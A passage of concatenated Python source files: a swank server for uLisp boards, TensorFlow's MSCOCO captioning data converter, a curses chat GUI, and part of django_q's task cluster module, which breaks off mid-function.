logging.info('Serving on: {0} ({1})'.format(ipaddr, port)) if port_filename: with open(port_filename, 'w') as port_file: logging.debug('Writing port_file {0}'.format(port_filename)) port_file.write("{0}".format(port)) def serve(ipaddr="127.0.0.1", port=0, port_filename=None, encoding="utf-8"): """Start a swank server on given port. If no port is provided then let the OS choose it. """ server = SwankServer((ipaddr, port), port_filename=port_filename, encoding=encoding) server.serve_forever() def swank_process(ipaddr="127.0.0.1", port=0, port_filename=None, encoding="utf-8"): server = Thread( target=serve, args=(ipaddr, port, port_filename, encoding) ) server.start() server.join(3) console = Thread( target=repl, kwargs=dict(prompt=PROMPT, locals=LOCALS, stdin=sys.stdin, stderr=sys.stderr) ) console.start() console.join() def main(read_input=False): """Main entry point. pro Args: read_input: if True parses the setup using raw_input to detect port_file instead of reading commandline arguments. 
""" ipaddr = "127.0.0.1" port = 0 encoding = "utf-8" port_filename = None board = "Adafruit Feather M4" logging.info("Waiting for setup string...") try: # At startup slime sends setup code like this as raw input: # (progn # (load "/home/user/.emacs.d/slime/swank-loader.lisp" :verbose t) # (funcall (read-from-string "swank-loader:init")) # (funcall (read-from-string "swank:start-server") "/tmp/slime.9999")) # This parses it and retrieves the port file to start the connection. try: setup = LispReader(raw_input()).read() except NameError: setup = LispReader(input()).read() if setup: port_filename = setup[-1][-1] except: logging.exception("Cannot parse setup from stdin. Parsing args...") if port_filename is None: logging.info("No setup string detected, parsing args...") try: import argparse parser = argparse.ArgumentParser() parser.add_argument("-b", "--board", help="name of the board to connect to") parser.add_argument("-a", "--ipaddr", help="bind address", default=ipaddr) parser.add_argument("-p", "--port", type=int, help="port", default=port) parser.add_argument("-f", "--port-filename") parser.add_argument("-e", "--encoding", default=encoding) args = parser.parse_args() except ImportError: import optparse parser = optparse.OptionParser() parser.add_option("-b", "--board", help="name of the board to connect to") parser.add_option("-a", "--ipaddr", help="bind address", default=ipaddr) parser.add_option("-p", "--port", type=int, help="port", default=port) parser.add_option("-f", "--port-filename") parser.add_option("-e", "--encoding", default=encoding) (args, _) = parser.parse_args() ipaddr = args.ipaddr port = args.port port_filename = args.port_filename encoding = args.encoding board = args.board logging.debug("%s", { 'ipaddr': ipaddr, 'port': port, 'port_filename': port_filename, 'encoding': encoding, 'board': board }) logging.info("Finding ulisp port") ulisp.open_port(board) swank_process(ipaddr, int(port), port_filename, encoding) if __name__ == "__main__": main()
build_mscoco_data.py
# Copyright 2016 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Converts MSCOCO data to TFRecord file format with SequenceExample protos. The MSCOCO images are expected to reside in JPEG files located in the following directory structure: train_image_dir/COCO_train2014_000000000151.jpg train_image_dir/COCO_train2014_000000000260.jpg ... and val_image_dir/COCO_val2014_000000000042.jpg val_image_dir/COCO_val2014_000000000073.jpg ... The MSCOCO annotations JSON files are expected to reside in train_captions_file and val_captions_file respectively. This script converts the combined MSCOCO data into sharded data files consisting of 256, 4 and 8 TFRecord files, respectively: output_dir/train-00000-of-00256 output_dir/train-00001-of-00256 ... output_dir/train-00255-of-00256 and output_dir/val-00000-of-00004 ... output_dir/val-00003-of-00004 and output_dir/test-00000-of-00008 ... output_dir/test-00007-of-00008 Each TFRecord file contains ~2300 records. Each record within the TFRecord file is a serialized SequenceExample proto consisting of precisely one image-caption pair. Note that each image has multiple captions (usually 5) and therefore each image is replicated multiple times in the TFRecord files. The SequenceExample proto contains the following fields: context: image/image_id: integer MSCOCO image identifier image/data: string containing JPEG encoded image in RGB colorspace feature_lists: image/caption: list of strings containing the (tokenized) caption words image/caption_ids: list of integer ids corresponding to the caption words The captions are tokenized using the NLTK (http://www.nltk.org/) word tokenizer. The vocabulary of word identifiers is constructed from the sorted list (by descending frequency) of word tokens in the training set. Only tokens appearing at least 4 times are considered; all other words get the "unknown" word id. NOTE: This script will consume around 100GB of disk space because each image in the MSCOCO dataset is replicated ~5 times (once per caption) in the output. This is done for two reasons: 1. In order to better shuffle the training data. 2. It makes it easier to perform asynchronous preprocessing of each image in TensorFlow. Running this script using 16 threads may take around 1 hour on a HP Z420. 
""" from __future__ import absolute_import from __future__ import division from __future__ import print_function from collections import Counter from collections import namedtuple from datetime import datetime import json import os.path import random import sys import threading import nltk.tokenize import numpy as np from six.moves import xrange import tensorflow as tf tf.flags.DEFINE_string("train_image_dir", "/tmp/train2014/", "Training image directory.") tf.flags.DEFINE_string("val_image_dir", "/tmp/val2014", "Validation image directory.") tf.flags.DEFINE_string("train_captions_file", "/tmp/captions_train2014.json", "Training captions JSON file.") tf.flags.DEFINE_string("val_captions_file", "/tmp/captions_val2014.json", "Validation captions JSON file.") tf.flags.DEFINE_string("output_dir", "/tmp/", "Output data directory.") tf.flags.DEFINE_integer("train_shards", 256, "Number of shards in training TFRecord files.") tf.flags.DEFINE_integer("val_shards", 4, "Number of shards in validation TFRecord files.") tf.flags.DEFINE_integer("test_shards", 8, "Number of shards in testing TFRecord files.") tf.flags.DEFINE_string("start_word", "<S>", "Special word added to the beginning of each sentence.") tf.flags.DEFINE_string("end_word", "</S>", "Special word added to the end of each sentence.") tf.flags.DEFINE_string("unknown_word", "<UNK>", "Special word meaning 'unknown'.") tf.flags.DEFINE_integer("min_word_count", 4, "The minimum number of occurrences of each word in the " "training set for inclusion in the vocabulary.") tf.flags.DEFINE_string("word_counts_output_file", "/tmp/word_counts.txt", "Output vocabulary file of word counts.") tf.flags.DEFINE_integer("num_threads", 8, "Number of threads to preprocess the images.") FLAGS = tf.flags.FLAGS ImageMetadata = namedtuple("ImageMetadata", ["image_id", "filename", "captions"]) class Vocabulary(object): """Simple vocabulary wrapper.""" def __init__(self, vocab, unk_id): """Initializes the vocabulary. Args: vocab: A dictionary of word to word_id. unk_id: Id of the special 'unknown' word. """ self._vocab = vocab self._unk_id = unk_id def word_to_id(self, word): """Returns the integer id of a word string.""" if word in self._vocab: return self._vocab[word] else: return self._unk_id class ImageDecoder(object): """Helper class for decoding images in TensorFlow.""" def __init__(self): # Create a single TensorFlow Session for all image decoding calls. self._sess = tf.Session() # TensorFlow ops for JPEG decoding. 
self._encoded_jpeg = tf.placeholder(dtype=tf.string) self._decode_jpeg = tf.image.decode_jpeg(self._encoded_jpeg, channels=3) def decode_jpeg(self, encoded_jpeg): image = self._sess.run(self._decode_jpeg, feed_dict={self._encoded_jpeg: encoded_jpeg}) assert len(image.shape) == 3 assert image.shape[2] == 3 return image def _int64_feature(value): """Wrapper for inserting an int64 Feature into a SequenceExample proto.""" return tf.train.Feature(int64_list=tf.train.Int64List(value=[value])) def _bytes_feature(value): """Wrapper for inserting a bytes Feature into a SequenceExample proto.""" return tf.train.Feature(bytes_list=tf.train.BytesList(value=[str(value)])) def _int64_feature_list(values): """Wrapper for inserting an int64 FeatureList into a SequenceExample proto.""" return tf.train.FeatureList(feature=[_int64_feature(v) for v in values]) def _bytes_feature_list(values): """Wrapper for inserting a bytes FeatureList into a SequenceExample proto.""" return tf.train.FeatureList(feature=[_bytes_feature(v) for v in values]) def _to_sequence_example(image, decoder, vocab): """Builds a SequenceExample proto for an image-caption pair. Args: image: An ImageMetadata object. decoder: An ImageDecoder object. vocab: A Vocabulary object. Returns: A SequenceExample proto. """ with tf.gfile.FastGFile(image.filename, "r") as f: encoded_image = f.read() try: decoder.decode_jpeg(encoded_image) except (tf.errors.InvalidArgumentError, AssertionError): print("Skipping file with invalid JPEG data: %s" % image.filename) return context = tf.train.Features(feature={ "image/image_id": _int64_feature(image.image_id), "image/data": _bytes_feature(encoded_image), }) assert len(image.captions) == 1 caption = image.captions[0] caption_ids = [vocab.word_to_id(word) for word in caption] feature_lists = tf.train.FeatureLists(feature_list={ "image/caption": _bytes_feature_list(caption), "image/caption_ids": _int64_feature_list(caption_ids) }) sequence_example = tf.train.SequenceExample( context=context, feature_lists=feature_lists) return sequence_example def _process_image_files(thread_index, ranges, name, images, decoder, vocab, num_shards): """Processes and saves a subset of images as TFRecord files in one thread. Args: thread_index: Integer thread identifier within [0, len(ranges)]. ranges: A list of pairs of integers specifying the ranges of the dataset to process in parallel. name: Unique identifier specifying the dataset. images: List of ImageMetadata. decoder: An ImageDecoder object. vocab: A Vocabulary object. num_shards: Integer number of shards for the output files. """ # Each thread produces N shards where N = num_shards / num_threads. For # instance, if num_shards = 128, and num_threads = 2, then the first thread # would produce shards [0, 64). num_threads = len(ranges) assert not num_shards % num_threads num_shards_per_batch = int(num_shards / num_threads) shard_ranges = np.linspace(ranges[thread_index][0], ranges[thread_index][1], num_shards_per_batch + 1).astype(int) num_images_in_thread = ranges[thread_index][1] - ranges[thread_index][0] counter = 0 for s in xrange(num_shards_per_batch): # Generate a sharded version of the file name, e.g. 
'train-00002-of-00010' shard = thread_index * num_shards_per_batch + s output_filename = "%s-%.5d-of-%.5d" % (name, shard, num_shards) output_file = os.path.join(FLAGS.output_dir, output_filename) writer = tf.python_io.TFRecordWriter(output_file) shard_counter = 0 images_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int) for i in images_in_shard: image = images[i] sequence_example = _to_sequence_example(image, decoder, vocab) if sequence_example is not None: writer.write(sequence_example.SerializeToString()) shard_counter += 1 counter += 1 if not counter % 1000: print("%s [thread %d]: Processed %d of %d items in thread batch." % (datetime.now(), thread_index, counter, num_images_in_thread)) sys.stdout.flush() writer.close() print("%s [thread %d]: Wrote %d image-caption pairs to %s" % (datetime.now(), thread_index, shard_counter, output_file)) sys.stdout.flush() shard_counter = 0 print("%s [thread %d]: Wrote %d image-caption pairs to %d shards." % (datetime.now(), thread_index, counter, num_shards_per_batch)) sys.stdout.flush() def _process_dataset(name, images, vocab, num_shards): """Processes a complete data set and saves it as a TFRecord. Args: name: Unique identifier specifying the dataset. images: List of ImageMetadata. vocab: A Vocabulary object. num_shards: Integer number of shards for the output files. """ # Break up each image into a separate entity for each caption. images = [ImageMetadata(image.image_id, image.filename, [caption]) for image in images for caption in image.captions] # Shuffle the ordering of images. Make the randomization repeatable. random.seed(12345) random.shuffle(images) # Break the images into num_threads batches. Batch i is defined as # images[ranges[i][0]:ranges[i][1]]. num_threads = min(num_shards, FLAGS.num_threads) spacing = np.linspace(0, len(images), num_threads + 1).astype(np.int) ranges = [] threads = [] for i in xrange(len(spacing) - 1): ranges.append([spacing[i], spacing[i + 1]]) # Create a mechanism for monitoring when all threads are finished. coord = tf.train.Coordinator() # Create a utility for decoding JPEG images to run sanity checks. decoder = ImageDecoder() # Launch a thread for each batch. print("Launching %d threads for spacings: %s" % (num_threads, ranges)) for thread_index in xrange(len(ranges)): args = (thread_index, ranges, name, images, decoder, vocab, num_shards) t = threading.Thread(target=_process_image_files, args=args) t.start() threads.append(t) # Wait for all the threads to terminate. coord.join(threads) print("%s: Finished processing all %d image-caption pairs in data set '%s'." % (datetime.now(), len(images), name)) def _create_vocab(captions): """Creates the vocabulary of word to word_id. The vocabulary is saved to disk in a text file of word counts. The id of each word in the file is its corresponding 0-based line number. Args: captions: A list of lists of strings. Returns: A Vocabulary object. """ print("Creating vocabulary.") counter = Counter() for c in captions: counter.update(c) print("Total words:", len(counter)) # Filter uncommon words and sort by descending count. word_counts = [x for x in counter.items() if x[1] >= FLAGS.min_word_count] word_counts.sort(key=lambda x: x[1], reverse=True) print("Words in vocabulary:", len(word_counts)) # Write out the word counts file. with tf.gfile.FastGFile(FLAGS.word_counts_output_file, "w") as f: f.write("\n".join(["%s %d" % (w, c) for w, c in word_counts])) print("Wrote vocabulary file:", FLAGS.word_counts_output_file) # Create the vocabulary dictionary. 
reverse_vocab = [x[0] for x in word_counts] unk_id = len(reverse_vocab) vocab_dict = dict([(x, y) for (y, x) in enumerate(reverse_vocab)]) vocab = Vocabulary(vocab_dict, unk_id) return vocab def _process_caption(caption): """Processes a caption string into a list of tonenized words. Args: caption: A string caption. Returns: A list of strings; the tokenized caption. """ tokenized_caption = [FLAGS.start_word] tokenized_caption.extend(nltk.tokenize.word_tokenize(caption.lower())) tokenized_caption.append(FLAGS.end_word) return tokenized_caption def _load_and_process_metadata(captions_file, image_dir): """Loads image metadata from a JSON file and processes the captions. Args: captions_file: JSON file containing caption annotations. image_dir: Directory containing the image files. Returns: A list of ImageMetadata. """ with tf.gfile.FastGFile(captions_file, "r") as f: caption_data = json.load(f) # Extract the filenames. id_to_filename = [(x["id"], x["file_name"]) for x in caption_data["images"]] # Extract the captions. Each image_id is associated with multiple captions. id_to_captions = {} for annotation in caption_data["annotations"]: image_id = annotation["image_id"] caption = annotation["caption"] id_to_captions.setdefault(image_id, []) id_to_captions[image_id].append(caption) assert len(id_to_filename) == len(id_to_captions) assert set([x[0] for x in id_to_filename]) == set(id_to_captions.keys()) print("Loaded caption metadata for %d images from %s" % (len(id_to_filename), captions_file)) # Process the captions and combine the data into a list of ImageMetadata. print("Processing captions.") image_metadata = [] num_captions = 0 for image_id, base_filename in id_to_filename: filename = os.path.join(image_dir, base_filename) captions = [_process_caption(c) for c in id_to_captions[image_id]] image_metadata.append(ImageMetadata(image_id, filename, captions)) num_captions += len(captions) print("Finished processing %d captions for %d images in %s" % (num_captions, len(id_to_filename), captions_file)) return image_metadata def main(unused_argv): def _is_valid_num_shards(num_shards): """Returns True if num_shards is compatible with FLAGS.num_threads.""" return num_shards < FLAGS.num_threads or not num_shards % FLAGS.num_threads assert _is_valid_num_shards(FLAGS.train_shards), ( "Please make the FLAGS.num_threads commensurate with FLAGS.train_shards") assert _is_valid_num_shards(FLAGS.val_shards), ( "Please make the FLAGS.num_threads commensurate with FLAGS.val_shards") assert _is_valid_num_shards(FLAGS.test_shards), ( "Please make the FLAGS.num_threads commensurate with FLAGS.test_shards") if not tf.gfile.IsDirectory(FLAGS.output_dir): tf.gfile.MakeDirs(FLAGS.output_dir) # Load image metadata from caption files. mscoco_train_dataset = _load_and_process_metadata(FLAGS.train_captions_file, FLAGS.train_image_dir) mscoco_val_dataset = _load_and_process_metadata(FLAGS.val_captions_file, FLAGS.val_image_dir) # Redistribute the MSCOCO data as follows: # train_dataset = 100% of mscoco_train_dataset + 85% of mscoco_val_dataset. # val_dataset = 5% of mscoco_val_dataset (for validation during training). # test_dataset = 10% of mscoco_val_dataset (for final evaluation). train_cutoff = int(0.85 * len(mscoco_val_dataset)) val_cutoff = int(0.90 * len(mscoco_val_dataset)) train_dataset = mscoco_train_dataset + mscoco_val_dataset[0:train_cutoff] val_dataset = mscoco_val_dataset[train_cutoff:val_cutoff] test_dataset = mscoco_val_dataset[val_cutoff:] # Create vocabulary from the training captions. 
train_captions = [c for image in train_dataset for c in image.captions] vocab = _create_vocab(train_captions) _process_dataset("train", train_dataset, vocab, FLAGS.train_shards) _process_dataset("val", val_dataset, vocab, FLAGS.val_shards) _process_dataset("test", test_dataset, vocab, FLAGS.test_shards) if __name__ == "__main__": tf.app.run()
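# Read-back sketch (not part of the conversion script): parse one record from a
# generated shard using the same context/feature_lists layout built in
# _to_sequence_example. The shard path is a placeholder, and the TF 1.x API
# (tf.python_io, tf.parse_single_sequence_example) matches the rest of the file.
import tensorflow as tf


def parse_record(serialized):
    context, sequence = tf.parse_single_sequence_example(
        serialized,
        context_features={
            "image/image_id": tf.FixedLenFeature([], dtype=tf.int64),
            "image/data": tf.FixedLenFeature([], dtype=tf.string),
        },
        sequence_features={
            "image/caption_ids": tf.FixedLenSequenceFeature([], dtype=tf.int64),
        })
    return context["image/image_id"], sequence["image/caption_ids"]


if __name__ == "__main__":
    record = next(tf.python_io.tf_record_iterator("/tmp/train-00000-of-00256"))
    with tf.Session() as sess:
        image_id, caption_ids = sess.run(parse_record(record))
        print(image_id, caption_ids)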
gui.py
import curses from curses import textpad import os import threading import traceback import time import client import curses_util class GUI(): def __init__(self, stdscr): global client_obj self.client_obj = client_obj self.username = 'G' self.password = 'password' self.y = 10 self.msg_list = [] threading.Thread(target=self.receive_msg).start() self.to = '$user$:G:' self.msg = '' self.last_msg = 'Nothing' curses.noecho() curses.curs_set(0) #curses.mousemask(1) #do not show cursor on click (turn off for debugging) curses.start_color() self.stdscr = stdscr self.stdscr.erase() #self.stdscr.nodelay(1) y, x = self.stdscr.getmaxyx() x1 = round((x/12)*3) x2 = x1 + round((x/12)*7) self.tab_focus = 'dashboard' self.draw_widgets(init = True) self.main() def draw_widgets(self, init=False): self.stdscr.erase() y, x = self.stdscr.getmaxyx() print(y, x) x1 = round((x/12)*3) x2 = x1 + round((x/12)*7) height_chats = round(y/2) groups_height = y - height_chats self.status_bar = self.stdscr.subwin(2, round((x/12)*7), 0, x1) self.status_bar.box() self.text_box_bar = self.stdscr.subwin(3, round((x/12)*7), round(y)-3, x1) #rows, columns, y, x self.text_box_bar.box() self.main_win = self.stdscr.subwin(round(y)-5, round((x/12)*7), 2, x1) self.main_win.box() try: self.active_users_win = self.stdscr.subwin(round(y), round((x/12)*2), 0, x2) except curses.error: self.active_users_win = self.stdscr.subwin(round(y), round((x/12)*2), 0, x2-1) self.active_users_win.box() ''' Chats and Groups ''' self.chats_win_chats = self.stdscr.subwin(height_chats, round((x/12)*3), 0, 0) #rows, columns, y, x self.chats_win_chats.box() self.chats_win_groups = self.stdscr.subwin(groups_height, round((x/12)*3), height_chats, 0) #rows, columns, y, x self.chats_win_groups.box() self.stdscr.addstr(0, 2, 'Chats') self.stdscr.addstr(height_chats, 2, 'Groups') if init == True: self.clock = curses_util.Clock(self.stdscr, 0, round((x/12)*3 + 2)) self.tb = curses_util.Textbox(self.stdscr, round(y)-2, x1+1) self.dashboard = curses_util.Scrollpad(self.stdscr, 1024*1024, round((x/12)*7)-2, uy=3, ux=(x1+1), dy=round(y)-6, dx=(x1+1)+round((x/12)*7)-3) self.chats_dashboard = curses_util.AdvancedScrollpad(self.stdscr, 1024*1024, round((x/12)*3)-3, uy=2, ux=2, dy=height_chats-2, dx=round((x/12)*3)-3) #self.chats_dashboard.load_file(os.getcwd() + '\\chats.txt') self.dashboard.resize(lines=(1024*1024), columns=(round((x/12)*7)-2), uy=3, ux=(x1+1), dy=round(y)-6, dx=(x1+1)+round((x/12)*7)-3) self.chats_dashboard.resize(lines=(1024*1024), columns=(round((x/12)*3)-3), uy=2, ux=2, dy=height_chats-2, dx=round((x/12)*3)-3) textbox_text = self.tb.text #print(textbox_text) self.tb = None self.tb = curses_util.Textbox(self.stdscr, round(y)-2, x1+1, text=textbox_text) self.tb.rewrite(textbox_text) ''' Status bar ''' self.clock.redraw(self.stdscr, round((x/12)*3 + 2)) self.stdscr.refresh() def receive_msg(self): while True: time.sleep(0.0001) self.msg = self.client_obj.msg #print(self.msg) if self.msg != None and self.last_msg != self.msg: print(self.msg) self.last_msg = self.msg print('Processing...') user_list = self.msg.split('@', 1) user = user_list[0] msg_list = user_list[1].split(':', 1) where = msg_list[0] msg = msg_list[1] y, x = self.stdscr.getmaxyx() self.y += 2 self.x = round((x/12)*3) print(user, msg) ''' Format msg ''' self.msg = self.msg.replace('\\n', '\n') self.dashboard.add_text(str(user) + ': ', 4) self.dashboard.add_text(str(msg), 2) self.stdscr.refresh() def main(self): try: self.draw_widgets() while True: time.sleep(0.0001) key = 
self.stdscr.getch() print(key) if self.tab_focus == 'dashboard': self.dashboard.input(key) elif self.tab_focus == 'chats': self.chats_dashboard.input(key) elif self.tab_focus == 'groups': pass else: self.tab_focus = 'dashboard' #print('INPUT') if key != curses.KEY_RESIZE:# and key != curses.KEY_UP and key != curses.KEY_DOWN: if key == 351: if self.tab_focus == 'dashboard': self.tab_focus = 'chats' elif self.tab_focus == 'chats': self.tab_focus = 'groups' elif self.tab_focus == 'groups': self.tab_focus = 'dashboard' else: self.tab_focus = 'dashboard' if key == curses.KEY_MOUSE: pass if key != curses.KEY_UP and key != curses.KEY_DOWN and key != curses.KEY_MOUSE and key != 351: self.tb.key_input(key) #self.stdscr.refresh() #self.stdscr.doupdate() #print(key) #for debugging if key == 289:# or curses.KEY_F1: #for debugging break elif key == 8: #self.draw_widgets() pass elif key == curses.KEY_ENTER or key == 10 or key == 13: self.client_obj.to = self.to self.client_obj.send(self.tb.text) self.dashboard.add_text('$YOU$' + ': ', 6) self.dashboard.add_text(str(self.tb.text), 3) self.tb.empty() else: pass else: curses.resize_term(0, 0) self.stdscr.erase() self.draw_widgets() #self.tb.key_input(key) #self.msg = self.msg + chr(key) #self.stdscr.addstr(30, len(self.msg), chr(key)) except Exception as e: traceback.print_exc() curses.endwin() os._exit(1) class Window(): def __init__(self, stdscr, height, width, y, x): self.stdscr = stdscr self.win = self.stdscr.subwin(height, width, y, x) def redraw(self, height, width, y, x): self.win.erase() self.win = None self.win = self.stdscr.subwin(height, width, y, x) def main(): curses.wrapper(GUI) def start(client_obj_): global client_obj client_obj = client_obj_ main()
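# Interface sketch (an assumption inferred from how GUI uses client_obj above: it reads
# client_obj.msg, assigns client_obj.to and calls client_obj.send()). The real
# implementation lives in client.py; this stand-in only documents that shape and lets
# the curses layout be exercised without a server. The "sender@where:text" message
# format below is likewise inferred from receive_msg(), not taken from client.py.
class DummyClient:
    def __init__(self):
        self.msg = None  # last raw message polled by GUI.receive_msg()
        self.to = ""     # recipient prefix set by the GUI before send()

    def send(self, text):
        # echo the outgoing text back as if a peer had answered
        self.msg = "echo@$user$:" + text


if __name__ == "__main__":
    import gui  # assumes this sketch lives next to gui.py
    gui.start(DummyClient())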
cluster.py
# Standard import ast import importlib import signal import socket import traceback import uuid from multiprocessing import Event, Process, Value, current_process from time import sleep # External import arrow # Django from django import db from django.conf import settings from django.utils import timezone from django.utils.translation import gettext_lazy as _ # Local import django_q.tasks from django_q.brokers import get_broker, Broker from django_q.conf import ( Conf, logger, psutil, get_ppid, error_reporter, croniter, resource, ) from django_q.humanhash import humanize from django_q.models import Task, Success, Schedule from django_q.queues import Queue from django_q.signals import pre_execute from django_q.signing import SignedPackage, BadSignature from django_q.status import Stat, Status class Cluster: def __init__(self, broker: Broker = None): self.broker = broker or get_broker() self.sentinel = None self.stop_event = None self.start_event = None self.pid = current_process().pid self.cluster_id = uuid.uuid4() self.host = socket.gethostname() self.timeout = Conf.TIMEOUT signal.signal(signal.SIGTERM, self.sig_handler) signal.signal(signal.SIGINT, self.sig_handler) def start(self) -> int: # Start Sentinel self.stop_event = Event() self.start_event = Event() self.sentinel = Process( target=Sentinel, args=( self.stop_event, self.start_event, self.cluster_id, self.broker, self.timeout, ), ) self.sentinel.start() logger.info(_(f"Q Cluster {self.name} starting.")) while not self.start_event.is_set(): sleep(0.1) return self.pid def stop(self) -> bool: if not self.sentinel.is_alive(): return False logger.info(_(f"Q Cluster {self.name} stopping.")) self.stop_event.set() self.sentinel.join() logger.info(_(f"Q Cluster {self.name} has stopped.")) self.start_event = None self.stop_event = None return True def sig_handler(self, signum, frame): logger.debug( _( f'{current_process().name} got signal {Conf.SIGNAL_NAMES.get(signum, "UNKNOWN")}' ) ) self.stop() @property def stat(self) -> Status: if self.sentinel: return Stat.get(pid=self.pid, cluster_id=self.cluster_id) return Status(pid=self.pid, cluster_id=self.cluster_id) @property def name(self) -> str: return humanize(self.cluster_id.hex) @property def is_starting(self) -> bool: return self.stop_event and self.start_event and not self.start_event.is_set() @property def is_running(self) -> bool: return self.stop_event and self.start_event and self.start_event.is_set() @property def is_stopping(self) -> bool: return ( self.stop_event and self.start_event and self.start_event.is_set() and self.stop_event.is_set() ) @property def has_stopped(self) -> bool: return self.start_event is None and self.stop_event is None and self.sentinel class Sentinel: def __init__( self, stop_event, start_event, cluster_id, broker=None, timeout=Conf.TIMEOUT, start=True, ): # Make sure we catch signals for the pool signal.signal(signal.SIGINT, signal.SIG_IGN) signal.signal(signal.SIGTERM, signal.SIG_DFL) self.pid = current_process().pid self.cluster_id = cluster_id self.parent_pid = get_ppid() self.name = current_process().name self.broker = broker or get_broker() self.reincarnations = 0 self.tob = timezone.now() self.stop_event = stop_event self.start_event = start_event self.pool_size = Conf.WORKERS self.pool = [] self.timeout = timeout self.task_queue = ( Queue(maxsize=Conf.QUEUE_LIMIT) if Conf.QUEUE_LIMIT else Queue() ) self.result_queue = Queue() self.event_out = Event() self.monitor = None self.pusher = None if start: self.start() def start(self): self.broker.ping() 
self.spawn_cluster() self.guard() def status(self) -> str: if not self.start_event.is_set() and not self.stop_event.is_set(): return Conf.STARTING elif self.start_event.is_set() and not self.stop_event.is_set(): if self.result_queue.empty() and self.task_queue.empty(): return Conf.IDLE return Conf.WORKING elif self.stop_event.is_set() and self.start_event.is_set(): if self.monitor.is_alive() or self.pusher.is_alive() or len(self.pool) > 0: return Conf.STOPPING return Conf.STOPPED def spawn_process(self, target, *args) -> Process: """ :type target: function or class """ p = Process(target=target, args=args) p.daemon = True if target == worker: p.daemon = Conf.DAEMONIZE_WORKERS p.timer = args[2] self.pool.append(p) p.start() return p def spawn_pusher(self) -> Process: return self.spawn_process(pusher, self.task_queue, self.event_out, self.broker) def spawn_worker(self): self.spawn_process( worker, self.task_queue, self.result_queue, Value("f", -1), self.timeout ) def spawn_monitor(self) -> Process: return self.spawn_process(monitor, self.result_queue, self.broker) def reincarnate(self, process): """ :param process: the process to reincarnate :type process: Process or None """ close_old_django_connections() if process == self.monitor: self.monitor = self.spawn_monitor() logger.error(_(f"reincarnated monitor {process.name} after sudden death")) elif process == self.pusher: self.pusher = self.spawn_pusher() logger.error(_(f"reincarnated pusher {process.name} after sudden death")) else: self.pool.remove(process) self.spawn_worker() if process.timer.value == 0: # only need to terminate on timeout, otherwise we risk destabilizing the queues process.terminate() logger.warning(_(f"reincarnated worker {process.name} after timeout")) elif int(process.timer.value) == -2: logger.info(_(f"recycled worker {process.name}")) else: logger.error(_(f"reincarnated worker {process.name} after death")) self.reincarnations += 1 def spawn_cluster(self): self.pool = [] Stat(self).save() close_old_django_connections() # spawn worker pool for __ in range(self.pool_size): self.spawn_worker() # spawn auxiliary self.monitor = self.spawn_monitor() self.pusher = self.spawn_pusher() # set worker cpu affinity if needed if psutil and Conf.CPU_AFFINITY: set_cpu_affinity(Conf.CPU_AFFINITY, [w.pid for w in self.pool]) def guard(self): logger.info( _( f"{current_process().name} guarding cluster {humanize(self.cluster_id.hex)}" ) ) self.start_event.set() Stat(self).save() logger.info(_(f"Q Cluster {humanize(self.cluster_id.hex)} running.")) counter = 0 cycle = Conf.GUARD_CYCLE # guard loop sleep in seconds # Guard loop. Runs at least once while not self.stop_event.is_set() or not counter: # Check Workers for p in self.pool: with p.timer.get_lock(): # Are you alive? 
if not p.is_alive() or p.timer.value == 0: self.reincarnate(p) continue # Decrement timer if work is being done if p.timer.value > 0: p.timer.value -= cycle # Check Monitor if not self.monitor.is_alive(): self.reincarnate(self.monitor) # Check Pusher if not self.pusher.is_alive(): self.reincarnate(self.pusher) # Call scheduler once a minute (or so) counter += cycle if counter >= 30 and Conf.SCHEDULER: counter = 0 scheduler(broker=self.broker) # Save current status Stat(self).save() sleep(cycle) self.stop() def stop(self): Stat(self).save() name = current_process().name logger.info(_(f"{name} stopping cluster processes")) # Stopping pusher self.event_out.set() # Wait for it to stop while self.pusher.is_alive(): sleep(0.1) Stat(self).save() # Put poison pills in the queue for __ in range(len(self.pool)): self.task_queue.put("STOP") self.task_queue.close() # wait for the task queue to empty self.task_queue.join_thread() # Wait for all the workers to exit while len(self.pool): for p in self.pool: if not p.is_alive(): self.pool.remove(p) sleep(0.1) Stat(self).save() # Finally stop the monitor self.result_queue.put("STOP") self.result_queue.close() # Wait for the result queue to empty self.result_queue.join_thread() logger.info(_(f"{name} waiting for the monitor.")) # Wait for everything to close or time out count = 0 if not self.timeout: self.timeout = 30 while self.status() == Conf.STOPPING and count < self.timeout * 10: sleep(0.1) Stat(self).save() count += 1 # Final status Stat(self).save() def pusher(task_queue: Queue, event: Event, broker: Broker = None): """ Pulls tasks of the broker and puts them in the task queue :type broker: :type task_queue: multiprocessing.Queue :type event: multiprocessing.Event """ if not broker: broker = get_broker() logger.info(_(f"{current_process().name} pushing tasks at {current_process().pid}")) while True: try: task_set = broker.dequeue() except Exception as e: logger.error(e, traceback.format_exc()) # broker probably crashed. Let the sentinel handle it. 
sleep(10) break if task_set: for task in task_set: ack_id = task[0] # unpack the task try: task = SignedPackage.loads(task[1]) except (TypeError, BadSignature) as e: logger.error(e, traceback.format_exc()) broker.fail(ack_id) continue task["ack_id"] = ack_id task_queue.put(task) logger.debug(_(f"queueing from {broker.list_key}")) if event.is_set(): break logger.info(_(f"{current_process().name} stopped pushing tasks")) def monitor(result_queue: Queue, broker: Broker = None): """ Gets finished tasks from the result queue and saves them to Django :type broker: brokers.Broker :type result_queue: multiprocessing.Queue """ if not broker: broker = get_broker() name = current_process().name logger.info(_(f"{name} monitoring at {current_process().pid}")) for task in iter(result_queue.get, "STOP"): # save the result if task.get("cached", False): save_cached(task, broker) else: save_task(task, broker) # acknowledge result ack_id = task.pop("ack_id", False) if ack_id and (task["success"] or task.get("ack_failure", False)): broker.acknowledge(ack_id) # log the result if task["success"]: # log success logger.info(_(f"Processed [{task['name']}]")) else: # log failure logger.error(_(f"Failed [{task['name']}] - {task['result']}")) logger.info(_(f"{name} stopped monitoring results")) def worker( task_queue: Queue, result_queue: Queue, timer: Value, timeout: int = Conf.TIMEOUT ): """ Takes a task from the task queue, tries to execute it and puts the result back in the result queue :param timeout: number of seconds wait for a worker to finish. :type task_queue: multiprocessing.Queue :type result_queue: multiprocessing.Queue :type timer: multiprocessing.Value """ name = current_process().name logger.info(_(f"{name} ready for work at {current_process().pid}")) task_count = 0 if timeout is None: timeout = -1 